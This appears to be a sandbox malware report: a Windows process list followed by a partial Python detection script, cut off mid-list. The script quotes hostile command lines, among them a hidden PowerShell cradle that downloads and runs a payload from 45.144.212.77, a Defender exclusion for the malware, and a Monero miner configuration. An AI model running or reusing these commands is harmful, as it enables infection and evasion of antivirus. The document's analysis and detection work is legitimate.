"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3260 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4456,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4508 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4632 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4832 /prefetch:8
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 2356"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe
"C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5892 -ip 5892
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 808
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2508 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3880 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2292 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2388 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2420 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2496 /prefetch:2
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 2356"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1392,15895515533642466494,13465131436476367318,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:3
C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe
"C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 2356"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vgpnm4xz\vgpnm4xz.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB81B.tmp" "c:\Users\Admin\AppData\Local\Temp\vgpnm4xz\CSCBC6EB7F1C56F4088AC3A5D91EAABC6C2.TMP"
C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe
"C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3956 /prefetch:2
C:\Windows\explorer.exe
explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3964 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2208 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4784 /prefetch:2
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2536 /prefetch:2
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10107710101\8a07a872cb.exe
"C:\Users\Admin\AppData\Local\Temp\10107710101\8a07a872cb.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
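The process list above pairs each image path with the command line it was started with, and the Network table that follows records every resolution and connection the sandbox saw. The script below is an added worked example, my own code and not the sandbox vendor's tooling, that turns a slice of those two artefacts into findings: miner flags (`--donate-level`, `-o pool:port`, a 95-character Monero address) under notepad.exe, the hidden PowerShell cradle fetching `http://45.144.212.77:16000/setup`, the `Add-MpPreference -ExclusionPath` call, the `tasklist /FI "PID eq 2356"` liveness poll, and `--remote-debugging-port=9223` on a browser main process cross-checked against the loopback connections to 127.0.0.1:9223. The process pairs and table rows are copied from this report; the tag names, the regular expressions and the choice of 80/443 as the only "standard" TCP ports are my assumptions.

```python
import re

# (image, command line) pairs copied from the process list in this report; my selection.
PROCESSES = [
    (r"C:\Windows\System32\notepad.exe",
     "--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40"),
    (r"C:\Windows\system32\tasklist.exe", 'tasklist /FI "PID eq 2356"'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"'''),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\2CsAdXyX\Anubis.exe""'''),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r'''"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"'''),
    (r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",   # child process: carries the flag, must not be re-flagged
     r'''"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1'''),
]

# Rows copied from the Network table in this report, including two of the rows
# whose Domain cell was lost in extraction (proto slid into the Domain column).
NETWORK_ROWS = [
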